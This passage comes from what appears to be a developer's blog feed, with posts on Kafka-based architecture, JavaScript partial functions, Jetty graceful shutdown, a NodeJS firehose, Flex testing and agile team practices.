uSwitch teams have been long-time users of <a href="">Kafka</a>. Kafka is a distributed message system with an eye on message durability. We decoupled the integration layer from the analytics data store (the data transformation was a stateless service by definition anyway) with a set of Kafka topics and a few workers. Now the integration layer was just publishing useful information to the topics, enabling multiple consumers to fetch data to support different needs.</p> <p><img src="/assets/ArchitectureV4.1.png" style="border:0" alt="Architecture for improved scalability"></p> <h2><a name="leverage-ecosystem"></a>Stage 5: Leveraging the uSwitch technology ecosystem</h2> <p><img src="/assets/ArchitectureV5.png" style="border:0" alt="Architecture for a better integration with the company technology ecosystem"></p> <p>We are now 30 months from go-live and this is our current architecture. The amount of data we produce and collect grew together with our business, and Postgres is not a viable solution anymore. We moved all our long-term analytical data to <a href="">Redshift</a>, aligning us with other uSwitch product teams that were already using it. Redshift now works as a cross-channel data warehouse, enabling more in-depth analysis and reports than before.
We also replaced some of the REST-based integrations with more Kafka topics: this gives us better resiliency and the benefit of a set of internal tools built for replayability.</p> Javascript: how to create partial functions 2014-12-30T00:00:00+00:00 <p><a href="">Currying</a> and <a href="">partial application functions</a> are very powerful techniques widely adopted by many functional languages.</p> <p>If you work with Javascript you can use the core function <a href="">bind</a> to easily create partial applications.</p> <p>Let’s look at an example.</p> <p>We have an array of objects:</p> <div class="highlight"><pre><code class="language-javascript" data-<span class="kd">var</span> <span class="nx">cities</span> <span class="o">=</span> <span class="p">[{</span><span class="nx">name</span><span class="o">:</span> <span class="s2">"Paris"</span><span class="p">,</span> <span class="nx">country</span><span class="o">:</span> <span class="s2">"France"</span><span class="p">},{</span><span class="nx">name</span><span class="o">:</span> <span class="s2">"London"</span><span class="p">,</span> <span class="nx">country</span><span class="o">:</span> <span class="s2">"UK"</span><span class="p">},{</span><span class="nx">name</span><span class="o">:</span> <span class="s2">"Rome"</span><span class="p">,</span> <span class="nx">country</span><span class="o">:</span> <span class="s2">"Italy"</span><span class="p">},{</span><span class="nx">name</span><span class="o">:</span> <span class="s2">"Manchester"</span><span class="p">,</span> <span class="nx">country</span><span class="o">:</span> <span class="s2">"UK"</span><span class="p">}];</span></code></pre></div> <p>and a function that, given a city object and a specific country, returns true if the city belongs to the given country:</p> <div class="highlight"><pre><code class="language-javascript" data-<span class="kd">var</span> <span class="nx">isIn</span> <span class="o">=</span> <span class="kd">function</span><span class="p">(</span><span class="nx">country</span><span class="p">,</span> <span class="nx">city</span><span class="p">)</span> <span class="p">{</span> <span class="k">return</span> <span class="nx">city</span><span class="p">.</span><span class="nx">country</span> <span class="o">===</span> <span class="nx">country</span><span class="p">;</span> <span class="p">};</span> <span class="nx">isIn</span><span class="p">(</span><span class="s2">"UK"</span><span class="p">,</span> <span class="nx">cities</span><span class="p">[</span><span class="mi">0</span><span class="p">]);</span> <span class="c1">//false</span></code></pre></div> <p>What if we’d like to filter the array looking for cities that are in a specific country?</p> <p>A partial function is a good approach to solve the problem, and <em>bind</em> makes creating one very simple.</p> <p>The syntax of <em>bind</em> is the following:</p> <div class="highlight"><pre><code class="language-javascript" data-<span class="nx">fun</span><span class="p">.</span><span class="nx">bind</span><span class="p">(</span><span class="nx">thisArg</span><span class="p">[,</span> <span class="nx">arg1</span><span class="p">[,</span> <span class="nx">arg2</span><span class="p">[,</span> <span class="p">...]]])</span></code></pre></div> <p>The first parameter is the value we want to bind the <em>this</em> keyword to when the created function is invoked, while the others are the actual parameters of the bound function.</p> <div class="highlight"><pre><code class="language-javascript" data-<span class="kd">var</span> <span class="nx">UKCity</span> <span class="o">=</span> <span class="nx">isIn</span><span class="p">.</span><span class="nx">bind</span><span class="p">(</span><span class="kc">null</span><span class="p">,</span> <span class="s2">"UK"</span><span class="p">);</span><span class="c1">//don't need to set the this keyword, just passing null</span> <span class="nx">UKCity</span><span class="p">(</span><span class="nx">cities</span><span class="p">[</span><span class="mi">0</span><span class="p">]);</span> <span class="c1">//false</span></code></pre></div> <p>We can now use the partial function <em>UKCity</em> as argument of the <em>filter</em> function:</p> <div class="highlight"><pre><code class="language-javascript" data-<span class="kd">var</span> <span class="nx">UKCities</span> <span class="o">=</span> <span class="nx">cities</span><span class="p">.</span><span class="nx">filter</span><span class="p">(</span><span class="nx">UKCity</span><span class="p">);</span>
<span class="c1">//UKCities === [{name: "London", country: "UK"}, {name: "Manchester", country: "UK"}]</span> <span class="c1">//getting the list of the Italian cities is as simple as:</span> <span class="nx">cities</span><span class="p">.</span><span class="nx">filter</span><span class="p">(</span><span class="nx">isIn</span><span class="p">.</span><span class="nx">bind</span><span class="p">(</span><span class="kc">null</span><span class="p">,</span> <span class="s2">"Italy"</span><span class="p">));</span> <span class="c1">//[{name: "Rome", country: "Italy"}]</span></code></pre></div> <p>In this example, creating a partial application function allows us to seamlessly compose our initial <em>isIn</em> function with a <a href="">higher order function</a> like <em>filter</em> to achieve more sophisticated outcomes.</p> <p>A gist with the whole example code is available <a href="">here</a>.</p> Clojure: graceful shutdown of an embedded Jetty instance 2013-07-15T00:00:00+00:00 <p>At <a href="" title="uSwitch">uSwitch</a>, several of our services are actually <a href="">Clojure</a> applications deployed with an embedded Jetty server (via the <a href="">Ring</a> adapter) and managed via the standard Unix service interface.</p> <p>For the business-critical services, zero downtime is a fundamental requirement: here comes <a href="">Jetty</a> graceful shutdown.</p> <p>Once the release-ready uberjar is deployed, we signal the Unix service that wraps our Clojure application with a restart. As part of the shutdown process Jetty will immediately close the HTTP listener (freeing the used HTTP port and making it available to the newly deployed embedded instance) while still taking care of completing the ongoing HTTP connections.</p> <h2>Ring 1.3.x and Jetty 7</h2> <p>If you are using Ring 1.3.x or older you are embedding Jetty 7. In that scenario this is the necessary configuration:</p> <script src=""> </script> <h2>Ring 1.4.x and Jetty 9</h2> <p>With Jetty 9 the web container is capable of keeping track of the open threads and of shutting itself down completely once they are finished (rather than waiting for a fixed amount of time). With Ring 1.4.x and higher the code will then look like:</p> <script src=""> </script> Web development in the large 2013-03-10T00:00:00+00:00 <p>Web development has dramatically changed over the past 5 years. Frameworks like <a href="">Rails</a> imposed themselves as the go-to choice for increased productivity; new stacks like <a href="">NodeJS</a> emerged and offered alternative ways of tackling web product development.</p> <p>Despite all the goodies offered by these tools, web development often ends up being way harder than it should be. Teams sink into a never-ending bug list, often adding unneeded technical complexity in an attempt to offer a better user experience, and hence very quickly transforming the application into an uncontrolled ball of mud.</p> <p>From my direct experience in building public-facing web products, there are a few core ideas that have to be the pillars of any web product; these are language/framework agnostic – even if certain tools support these principles better than others.</p> <p>These recommendations mostly relate to a scenario where a pure single-page web app is not a viable solution (see <a href="#target-audience">this</a> section for a more in-depth analysis). Some of these principles are applicable even if you are targeting that style, but they might be less effective.</p> <h2><a id="target-audience"></a>Understand your target audience</h2> <p>You want to have a very clear idea of the browsers you have/want to support.
Building a product that works only on HTML5-friendly browsers while 50% of your audience is on IE8 is not the best way to give your product the right boost. If you are replacing an existing product, use <a href="">Google Analytics</a> historical data to understand the current browser segmentation, while if you are building something totally new, invest some time in understanding who your customers will be. Knowing your audience can heavily influence the architecture of your application: a single-page app can be a perfect fit for a mobile-only app (most of the mobile browsers are HTML5 friendly) but it might be a bad choice for a product that has to be consumed by less modern browsers.</p> <h2>Use progressive enhancement techniques aggressively</h2> <p>Build every feature from the ground up. The more your website works without javascript, the more extensible it will end up being.</p> <p>What does this really mean?</p> <ul> <li><p>Your product <strong>has</strong> to work without javascript. Of course this is heavily influenced by the <a href="#target-audience">previous guideline</a>, but unless you are building a 100% single-page app you should always ask yourself how to build a feature starting from the HTML-over-HTTP flow.</p></li> <li><p>Once the HTML-over-HTTP feature is there, enhance components via javascript in order to improve the experience.</p></li> <li><p>Go for a multi-layered enhancement approach.</p> <ol> <li>Look at what <a href="">HTML5 features</a> are available on the browsers you want to support and if possible rely on them (datepicker and validation are two good examples of HTML5 features that are getting more and more support).</li> <li>If there’s no native support for certain browsers then smoothly degrade to a javascript version.</li> <li>Finally, if the javascript version results in a heavy experience on specific devices, just leave the basic functionality without any bells and whistles.</li> </ol> </li> </ul> <p>The advantage in this case is a consistent reduction of the code you have to take care of over time; because HTML5 features are natively built into the browsers, you get a performance boost for free. Also, they are often already supported on mobile browsers, giving you a native experience in the mobile version of the product for free.</p> <h2>Prefer HTML snippets over JSON</h2> <p>JSON is extremely powerful and easy to use, but it’s not the solution for everything. Often we need to pass data from the server side to the browser as a consequence of an AJAX request to build new parts of the interface.</p> <p>Unless you are thinking of consuming the exposed JSON data from a heterogeneous set of clients, you should just expose HTML snippets that you can then embed directly into your page.</p> <p>This approach gives you:</p> <ul> <li>Progressive enhancement out of the box.</li> <li>A substantial reduction in client-side computation, something that is critical for less modern browsers.</li> <li>A massive reduction of your front-end code spread: if you let the server side build the HTML snippet, you can use your favourite markup/markdown language without hand-rolling a client-side version of it or importing yet another dependency into the browser.</li> </ul> <h2>Use HTTP status codes</h2> <p>The <a href="">HTTP protocol</a> contains everything you need to control and define the interaction between different parties in a scalable and fault-tolerant way. When you need to return a specific status to your AJAX call there’s no need to reinvent the wheel by sending a custom JSON object to say that an error happened or that the specific operation is not acceptable: just use the right <a href="">HTTP status code</a>.
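<p>As an illustration (the handler below is a hypothetical sketch, not from an actual codebase), an AJAX endpoint that cannot find the requested resource should simply answer with a 404 and, following the previous guideline, an HTML snippet as the body:</p>

```javascript
// Sketch: answer an AJAX request with the right status code instead of
// a custom {"error": ...} JSON envelope. The resource lookup and the
// HTML snippet are stand-ins for illustration only.
function buildResponse(resource) {
  if (resource === undefined) {
    return { status: 404,
             headers: { "Content-Type": "text/html" },
             body: "<p>Not found</p>" };
  }
  return { status: 200,
           headers: { "Content-Type": "text/html" },
           body: "<div class='city'>" + resource.name + "</div>" };
}
```

<p>The browser-side code can then branch on the status code alone, with no custom error envelope to parse.</p>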
Embracing a HATEOAS architectural style can help you shape your systems and APIs, going beyond basic CRUD with a more holistic view of your system as a good citizen in the HTTP stack.</p> <h2>Leverage HTTP caching</h2> <p>The HTTP protocol gives you a wide range of <a href="">caching options</a> through header directives. Before introducing a cache at the domain model layer, ask yourself if the same couldn’t be achieved at the HTTP level.</p> <h2>Think about resource shareability (URLs with resource ids)</h2> <p>The web is really about sharing, and URLs are the way we share resources.</p> <p>Use URLs containing the resource id to expose the different states of your resources to the world, and use authentication and authorization layers to control resource access.</p> <p>Don’t be tempted to trade off the uniqueness of the resource URL for pretty links; links that are easy for humans to read and remember are a nice-to-have, but this style doesn’t always support the needs of your application. Even if your web application doesn’t demand sharing, this is a valid test to verify the solidity of your system: would it be easy to expose a resource to a third party? Is a specific state of a resource uniquely identified by a URI? If the answer to these questions is no, there’s a clear smell that the application is not using the right semantics to move from one internal state to another.</p> Flow control in Javascript 2011-09-26T00:00:00+00:00 <p><a href="">Mark Needham</a> recently wrote a <a href="">blog post</a> on how his team worked around an unwanted asynchronous Javascript behaviour.</p> <p>They wanted to iterate over a collection, execute some code for each element and, only when the whole collection had been traversed, execute a final step.</p> <script src=""></script> <p>This didn’t work as expected. Due to the asynchronous nature of Javascript, the <em>do something with grid</em> block is invoked before the grid itself is filled, and nothing interesting happens.</p> <p>Their solution to this was removing any possible event-driven behaviour and handling control in a fully imperative way, explicitly calling functions in the expected sequence.</p> <script src=""></script> <p>This works, but it’s not leveraging Javascript’s nature; the code itself also ends up harder to understand than it should be.</p> <p>How can the same problem be solved by embracing asynchronous thinking?</p> <script src=""></script> <p>The way to achieve control flow in Javascript is with events.</p> <p>When a block is completed it emits an event. All the interested parties will be listening for that specific event and will execute their specific task, contributing to our overarching business flow. This alternative solution is probably also more idiomatic and, as a consequence, more concise and easier to read.</p> Introducing node-tail: a NodeJS tail library 2011-09-15T00:00:00+00:00 <p>In the <a href="" title="firehose" target="_blank">previous blog post</a> I described the architecture of the firehose we built at <a href="" title="forward Internet Group" target="_blank">Forward</a> with NodeJS.</p> <p>At the lowest level each node has to tail a log file. <a href="">Tom Hall</a> and I couldn’t find any useful cross-platform (i.e.
not relying on the unix <em>tail</em> command) node module for that task, so I ended up writing <a href="">node-tail</a>.</p> <p>Using node-tail is very simple:</p> <script src=""></script> <p>node-tail is also available via npm, just install it with: <code>npm install tail</code></p> Building a firehose with NodeJS 2011-09-12T00:00:00+00:00 <p>In <a href="" target="_blank">Forward</a> we handle a huge stream of real-time data and we are always looking for interesting ways to use it.</p> <p>We already have a <a href="" title="Hadoop" target="_blank">Hadoop</a> cluster for high-latency analysis (mostly reporting), but recently we started building a set of tools that can give us a near real-time view of what’s going on. With this goal in mind I have recently been involved in building a data firehose with <a href="">NodeJS</a>.</p> <p>The result is the following: <img src="/assets/firehose.png"></p> <p>The lowest layer of the firehose is a thin component installed on each server that tails the log file we care about and publishes each log entry to a collector (called firehose-master) via <a href="">ZeroMQ</a>.
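<p>Conceptually the per-server component is tiny; decoupled from the concrete transports it is just the following (a sketch: <code>source</code> would be a node-tail <code>Tail</code> instance emitting <code>line</code> events, and <code>publish</code> a ZeroMQ send):</p>

```javascript
// Sketch of the per-server component: anything emitting "line" events
// (e.g. a node-tail Tail instance) is forwarded line by line to a
// publish function (e.g. a ZeroMQ socket send). Both transports are
// injected, so this core needs neither a log file nor a broker.
function forwardLines(source, publish) {
  source.on("line", function (line) {
    publish(line);
  });
}
```

<p>Because both ends are injected, this core can be exercised with any event emitter and a plain function, with no log file or socket required.</p>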
The master collects the log entries from all the nodes and republishes everything to the rest of our software ecosystem as a single stream via a single <a href="" title="ZeroMQ" target="_blank">ZeroMQ</a> endpoint.</p> <p>With this architecture we easily preserve the horizontal scalability of our main service; in fact, adding a new node to the firehose is as simple as installing the tail component on the new server and adding its IP address to the master configuration file.</p> <p>This stream can now be the core foundation of clients that consume the firehose for different purposes, from real-time trends visualisation to <a href="" title="HDFS" target="_blank">HDFS</a> data bulk load.</p> Javascript testing 2010-06-15T00:00:00+00:00 <p>Javascript has become in the last few years <em>the</em> language for rich web applications, but it still rarely receives the level of attention it deserves.</p> <p>Libraries such as <a href="" title="jQuery" target="_blank">jQuery</a> boost our productivity, but the code we often end up writing tends to be a <a href="" title="big ball of mud" target="_blank">big ball of mud</a>, with an entangled mix of presentation logic, business logic and server-side interaction, all incredibly hard to test and to maintain.</p> <p>It’s time to move away from this approach and start writing better-quality Javascript.</p> <p>The very first step required to avoid Javascript spaghetti code is to start thinking of <strong>Javascript as a first-class language</strong>, and to start dealing with it with the same mindset and approach we would use for any server-side language.</p> <p>With this new approach, in the same way we identify roles and integration points in server-side code, we want to start building <strong>abstractions</strong> in our Javascript codebase.</p> <p>With the right abstractions in place we are defining clear boundaries between different parts of the system, and as a consequence our code is simpler, we promote reuse and the <a href="'t_repeat_yourself" title="DRY principle" target="_blank">DRY principle</a>, and we finally enable better testing.</p> <p>Let’s look at any standard Web 2.0 Javascript code from this new perspective: now the DOM and HTTP are two clear integration points.</p> <p>Our javascript code manipulates the DOM, adding nodes or changing existing nodes’ content, in the same way any other language would interact with a database. Each call to a server over HTTP via Ajax is exactly the same as calling a web server from our server-side code.</p> <p>With these first two abstractions in mind, we can start rewriting our code, isolating these interactions behind clearly defined objects.</p> <p>Now the javascript code is not a ball of mud anymore, but a network of objects that collaborate. With these smaller objects in place we can now <strong>favour interaction-based tests</strong>, moving away from any dependency on the DOM and on the HTTP protocol.</p> <p>The identified abstractions let us mock and stub things out and test whether the different tiers in our javascript code are exchanging the right messages. This separation of concerns keeps the business logic nicely isolated from the user interface transformations, also enabling cleaner state-based testing for that specific part of the code (there are no more dependencies on the DOM).</p> Italian Agile Day 2009: date announced 2009-08-02T00:00:00+00:00 Friday, 20th of November 2009, the <a href="" title="Italian Agile Day" target="_blank">6th Italian Agile Day</a> will be held in Bologna. It's a great opportunity to share experiences and practices, learn, discuss and meet other practitioners from the Agile community...and it's free :-) I'll see you there! What has to be ready for the beginning of a project?
2009-07-05T00:00:00+00:00 <p>The beginning of a project is always a hectic period where several things have to be put in place in order to be able to start the actual development from a solid position.</p> <p>Interestingly enough, I see that what is important to have ready for ThoughtWorkers most of the time is not what has to be ready for other people.</p> <p>Given that obviously every project is different and deserves specific attention, here is my list of things that have to be ready before the kick-off of iteration 1.</p> <p><strong>Infrastructure</strong></p> <p>A repository, a Continuous Integration environment with <a href="" title="Cruise" target="_blank">Cruise</a> (or suitable alternatives) installed and working, a QA environment where we can deploy every successful build whenever we want, a basic build script (i.e. build/run tests/package). Pairing boxes, each one with exactly the same configuration.</p> <p><strong>Architecture</strong></p> <p>Just identify the core services/components; there’s no need to go into detail for each one at this time of the project. Identifying the main responsibility of each service is good enough for now; the details will be discovered later in the project. If we can easily identify the way services will communicate (web service? message broker?) good; if not, through good OO principles we can abstract the low-level mechanism and reduce the cost of change later, deferring the final decision to the point in the project where we have more understanding of the technological constraints.</p> <p><strong>Patterns</strong></p> <p>Pairing and frequent pair rotation will help in spreading the knowledge of the approach to solve specific problems and in maintaining consistency throughout the code base, so most of the time there is no need to define a sort of “project dictionary” of valid patterns at day 1.
If we’re introducing new approaches to solve a specific problem, it’s important to highlight pros and cons of the approach so that people know what they are doing once pairing.</p> <p>Most of the time these are probably enough to start Iteration 1.</p> <p>All the other decisions can (and sometimes should…) be deferred to a later stage.</p> <img src="" height="1" width="1" alt=""/> QA productivity metrics 2009-03-31T00:00:00+00:00 <p>In a lot of companies the QAs productivityi s measured through the number of defects she raised: the more defects she finds, the harder she works, therefore the better she is.</p> <p>This approach has an interesting corollary: if you have really good QAs you don’t have good developers. If your QAs are finding a lot of defects this means that your developers are quite poor and are regularly introducing defects in the code base.</p> <p>This approach isn’t obviously team oriented: QA and Development are seen as two separate and independent entities that interact through a specific contract.</p> <p>If we truly believe in collaboration the most important productivity metrics are not related to a specific role/skills set but to the team capability of deliver quality software in time and in budget.</p> <p>We need to ask ourselves why the defects are finding their way into the application deployed in the live environment (incomplete acceptance criteria? not enough analysis or understanding of the domain? gap in the test suite?), and fix the issue as a team, not just using that number as the boundary between two work streams.</p> <img src="" height="1" width="1" alt=""/> Local optimization doesn't necessarily mean improvement 2009-02-14T00:00:00+00:00 <p>Delivering software is a pretty complex activity that requires interaction between people with different skill sets. 
One of the cornerstone of Agile Development is continuous improvement, and one of the tool often used to learn and improve is the <a href="" title="Retrospectives" target="_blank">retrospective</a>.</p> <p>In a context where the collaboration is not effective, people tend to look for local optimization instead of seeing the big picture, and you have things such the “QA retrospective” or the “Developer retrospective”.</p> <p>In this scenario a “QA retrospective” (as the Dev’s one, or a BA’s one) is probably more harmful than anything else; the specific issues that will be identified won’t address the whole activity of delivering software but will only be focused on that specific step (“we need <em>x</em> to do y”).</p> <p>But what is the impact of that step in the overall process ?</p> <p>How that step fits into the chain of event that will take a business idea to be delivered as a software artifact (hopefully in a timely and quality fashion ) ?</p> <p>Don’t get me wrong: it’s definitively through specific improvements that you improve your overall process but if don’t frame your changes in the big picture, it’s more likely that your changes will impact your process in the wrong direction and actually cause an additional waste.</p> <p>Each attempt of optimization should therefore start from the clear analysis of what is wrong from a high level point of view and only then it’s time to shift our attention to the specific details of each step.</p> <img src="" height="1" width="1" alt=""/> Acceptance Testing of Flex applications 2009-01-26T00:00:00+00:00 <p><a href="" title="Acceptance Testing" target="_blank">Acceptance Testing</a> is a fundamental practice: it gives you confidence that your application behaves as expected from the end customer point of view.</p> <p>In the <a href="" title="Flex" target="_blank">Flex</a> world there are some projects that are currently emerging in the Acceptance Testing space, each one with specific advantages and weak points.</p> 
<p>Let’s have a look at some of these.</p> <p><strong>FlexMonkey</strong></p> <p><a href="" title="FlexMonkey" target="_blank">FlexMonkey</a> Open source but based on closed source API (the <a href="" title="Automation API" target="_blank">Automation API</a> are released only with <a href="" title="FlexBuilder" target="_blank">FlexBuilder</a> and not with the open source Flex SDK), it’s based on the record-playback approach and as far I have seen is not easily integrable with a Continuous Integration server.</p> <p><strong>Flash-Selenium</strong></p> <p><a href="" title="Flash-Selenium" target="_blank">Flash-Selenium</a> is open source, and it works as an extension of SeleniumRC; the tests can be written in Java, .Net, Ruby or Phyton and the integration with a Continuous Integration server is therefore quite out of the box. <strong><a href="" title="SeleniumFlex API" target="_blank"> </a></strong><strong>SeleniumFLex API</strong> <a href="" title="SeleniumFlex" target="_blank">SeleniumFlex</a> is another open source project. it’s an extension of SeleniumIDE, test should be written in Selenese.</p> <p><strong>FunFX</strong></p> <p><a href="" title="FunFX" target="_blank">FunFX</a> is based on the automation API (therefore you can use it only if you’re owner of FlexBuilder), the fixtures are written in Ruby.</p> <p>At the moment there isn’t a de-facto solution: the community is quite dynamic and all these different tools are trying to find their space.</p> <p>Which one is my favourite ?</p> <p>It’s really hard to say, I think that the context matters a lot. 
I don’t like solutions that require the Automation API simply because this hooks you to a vendor just for testing; it’s also true that the pure open source solutions require some extra-hack (like exposing methods through <a href="" title="ExternalInterface" target="_blank">ExternalInterface</a>) that is less than ideal.</p> <p>Looking at the two pure open source tools I like Flash-Selenium for its out of the box integration with Continuous Integration server, while I prefer Selenium-Flex approach for handling the necessary ExternalInterface configuration.</p> <img src="" height="1" width="1" alt=""/> Signs of poor communication 2008-09-28T00:00:00+00:00 <p>Walking in an office and just looking around for 10 minutes is enough to have a feeling of the level of communication in that environment.</p> <p>When:</p> <ul> <li>co-located people communicate mainly via IMs, mails, or comments on online collaborative tools instead of face-to-face conversation</li> <li>a heavyweight tool is the preferred way for driving the work flow instead of using it only for backup and tracking</li> <li>on the whiteboard you can read the outcomes of the retrospective of 7 months before</li> </ul> <p>There’s <em>definitively</em> something wrong.</p> <p>What about your team? 
How many of the above bullet points are you ticking off?</p> <img src="" height="1" width="1" alt=""/> Flex: How to achieve proper separation of responsibilities 2008-06-24T00:00:00+00:00 <p>In a <a href="" title="Working with Adobe Flex" target="_blank">previous post</a> I was discussing on my experience with Flex and one of the highlighted pain points is the extremely poor quality of the available tutorials.</p> <p>Let’s have a look at the source code of the <a href="" title="Flickr Tutorial" target="_blank">Flick tutorial</a>:</p> <script src=""></script> <p>In a single page you have:</p> <ul> <li>The declaration of visual components (<em>TileList</em>)</li> <li>the declaration of non visual component (<em>HTTPService</em>)</li> <li>event handling (<em>photoHandler</em>)</li> <li>data binding (<em>photoFeed</em>)</li> <li>pure logic (<em>requestPhotos</em>)</li> </ul> <p>If you decide to follow this development model you will obtain something that is extremely fragile to evolve or simply just to maintain.</p> <p>Let’s start assigning the right responsibilities to the right objects.</p> <p><strong>The first step</strong> is creating our own Application object and use it as root in the mxml file:</p> <script src=""></script> <p>Now the HttpService component is not exposed anymore (and ideally can also be injected) and the events handling in the right place.</p> <p><strong>The second step</strong> is to extend the HttpService object to place the <em>requestPhotos</em> behaviour in the service. 
The result is below:</p> <script src=""></script> <p>At the end of this refactoring our mxml file looks like this:</p> <script src=""></script> <p>Here now we are declaring only visual components, and its only role is defining what we want to see and how.</p> <img src="" height="1" width="1" alt=""/> Working with Adobe Flex 2008-06-21T00:00:00+00:00 <p><a href="" target="_blank">RIA</a> is a pretty hot topic in these days; even in <a href="" target="_blank">ThoughtWorks</a> a lot of discussions are going on (if you have time check fellow ThoughtWorkers posts <a href="" target="_blank">here</a>, <a href="" target="_blank">here</a> and <a href="" target="_blank">here</a>).</p> <p>I’m quite involved in the conversation, mostly due to the use of <a href="" title="Flex" target="_blank">Adobe Flex </a>in my current project.</p> <p><strong>What is Flex ?</strong></p> <p>Flex is the Adobe solution for RIA; based on <a href="" target="_blank">ActionScript</a>, it promises quick development of rich UI, the ability of testing and TDD-ing, good tools for development and out of the box integration with Web Services and REST services.</p> <p>Everything sounds cool, but my experience with Flex highlighted few elements that worth a bit of attention…let’s analyze those one by one.</p> <p><strong>Testability</strong></p> <p>ActionScript is actually really hard to test.</p> <p>A Unit testing framework (<a href="" target="_blank">FlexUnit</a>) is available but it cannot be used by command line because the test runner works only in your browser; this slow down your development cycle (red-green-refactor) quite a lot, reducing your effectiveness during the day.</p> <p>ActionScript is a half way between a static and a dynamic language (with a clear direction towards being a pure static language, my guess is that the language designers are trying to increase the language appeal to the Java and the .Net community).The main concert here is you miss the testing support of static 
languages(mock libraries mostly) and of a dynamic one you’re missing the complete dynamic approach(all the classes are sealed by default, and you can’t do methods override at runtime even for objects that are explicitly declared dynamic).</p> <p>In this scenario interaction testing is nearly impossible to do; sure, you can write your own mock library or stub everything out but this is a pretty strategic decision and a lot depends on the scope of the project.</p> <p><strong>Flex Security Model</strong></p> <p>Another aspect that gave us more than one trouble is Flex security model.</p> <p>A Flex application can connect to a WebService or a REST service only if:</p> <ul> <li>the target service is on the same domain where the Flex application is deployed</li> <li>the target service is on an external domain but in the target domain there is a <em>crossdomain.xml</em> file that declares your domain as secure</li> </ul> <p>What does it mean ? That if I want to access a public feed (let’s say the BBC weather feed) BBC has to have my domain specified on its <em>crossdomain.xml</em> file that lives on its server.</p> <p>This is a strong limitation: you cannot simply call BBC and ask to add your domain to their list of trusted site, and this take you down the path of over design your application (like adding a proxy web service on your domain just to be able to get the real data you need from BBC).</p> <p><strong>Tutorials and suggested best practices</strong></p> <p>A final comment is for the Adobe tutorials: it’s hard to see in 2008 something so poor. The tutorials (have a look at the <a href="" target="_blank">Flickr one</a> to have an idea) are a collection of bad practices: the suggested development style is spaghetti-code, where you write all the code in the Script tag within your main Flex application file (mxml).</p> <p>And what about separation of responsibilities ? 
Do we really think that this is the code you obtain doing TDD ?</p> <p>The heavily usage of the Script tag will take you down maintenance nightmares, transforming your application in something that is quickly out of your control and you cannot evolve.</p> <p><strong>Final thoughts</strong></p> <p>Looking at these pain points I can’t sat that Flex is a mature technology. Adobe promises a lot but a number of the promises are not there; TDD is simply too hard to do due to the lack of mock support(even if <a href="" title="TDD in Flex" target="_blank">looks promising</a>), the set of possible permissions you can give to the Flash player clashes with the new services oriented features (introducing cumbersome security model that take you to overdesign as a possible workaround), and tooling is quite poor (FlexBuilder, the IDE, crashes regularly and the Ant task is pretty basic).</p> <img src="" height="1" width="1" alt=""/> Article: Seniority, Respect, Authority and an Agile Team 2008-05-25T00:00:00+00:00 <a href="" title="Seniority, Respect, Authority and an Agile Team" target="_blank">Here</a> on <a href="">InfoQ</a> some interesting thoughts around Seniority and Authority in an Agile team. <img src="" height="1" width="1" alt=""/> Article: Patrick Kua on the Agile Coach role 2008-05-25T00:00:00+00:00 <a href="" title="Agile coach A to Z" target="_blank">Here</a> a really good article from my friend <a href="" target="_blank">Patrick Kua</a> on the Agile Coach role. <img src="" height="1" width="1" alt=""/> Ivy: how to download dependencies to different folders 2008-04-17T00:00:00+00:00 <p><a href="">Ivy</a> is a dependency manager that lets you define in a declarative way directly in the build file the dependency of your project.</p> <p>In order to download dependencies in different folders (i.e. 
separate the runtime dependencies from the testing ones) you have to define configurations.</p> <p>Let’s say we have this project structure:</p> <ul> <li>lib <ul> <li>prod</li> <li>test</li> </ul> </li> </ul> <p>We need three different things to achieve our goal:</p> <p>The first step is defining in your ivy.xml a configuration for each folder:</p> <script src=""></script> <p>Then we need to define the actual dependencies assigning to each one the right configuration(in this scenario both are extending the default one):</p> <script src=""></script> <p>Finally we need to define the pattern in the <em>ivy:retrieve</em> tag</p> <script src=""></script> <img src="" height="1" width="1" alt=""/> Integrate Ivy in a dotNet build 2008-04-17T00:00:00+00:00 <p>I’m currently involved in a .Net shop and I’m working on redesigning the build pipeline (good old CI stuff). <a href="">Ivy</a> appeared in our brainstorming sessions as a solution for having a more defined control on the projects dependencies requirement.</p> <p>The problem is that currently (but you never know about the future ;-) ) there isn’t a .Net native port of Ivy.</p> <p>This can be solved using the <em>exec</em> tag from your NAnt script and using java as an external program. Here is the bit to add to your NAnt build script:</p> <script src=""></script> <img src="" height="1" width="1" alt=""/> Essap 2008 2008-04-09T00:00:00+00:00 For the third year the European Summer School of Agile Programming(Essap) is a great opportunity to learn more about Agile Methodologies. <a href="" title="Essap">Here</a> the website of the school: check it out. <img src="" height="1" width="1" alt=""/> Just a bit of confusion... 2008-03-29T00:00:00+00:00 From a job offer recently received: [...]Please note it is essential that applicants have worked in a structured development environment ideally **utilising the Agile (SCRUM, XP) methodology or any other similar methods such as Waterfall**, RAD or RUP[...] Just awesome. 
<img src="" height="1" width="1" alt=""/> Express your business requirements through your code 2008-03-02T00:00:00+00:00 <p>Last week I was working with a colleague on the implementation of a fairly simple validation of a character: the criteria for validation was that the character had to be lower case or a digit.</p> <p>Looking at the Javadoc we spotted a couple of useful methods in the Character class: <em>isLetterOrDigit</em> -this method is pretty straightforward- and is <em>LowerCase</em> that returns false for upper case letter and everything is not a letter.</p> <p>The code we wrote looked like:</p> <pre><code>if (!isLowerCase(aCharacter) &&!isDigit(aCharacter)) { //... //error !! } </code></pre> <p>All the tests passed. Fairly simple and coincise solution.</p> <p>But..<strong>are we actually expressing the business requirements ?</strong></p> <p><strong>No.</strong> Not al all.</p> <p>Our code is not communicating clearly what we’re trying to achieve: the API is not clearly expressing that punctuations are not allowed.</p> <p>The expected behaviour is there but the code is still not in an ideal shape: we need to be able to clearly express what we really need to validate.</p> <p>The refactored code looked like:</p> <pre><code>if (!isALowerCaseCharacter(aCharacter) && !isDigit(aCharacter)) { </code></pre> <p>where <em>isALowerCaseCharacter</em> was:</p> <pre><code>private boolean isALowerCaseCharacter(char aCharacter) { return isLetter(aCharacter) && isLowerCase(aCharacter); } </code></pre> <p>This is better. 
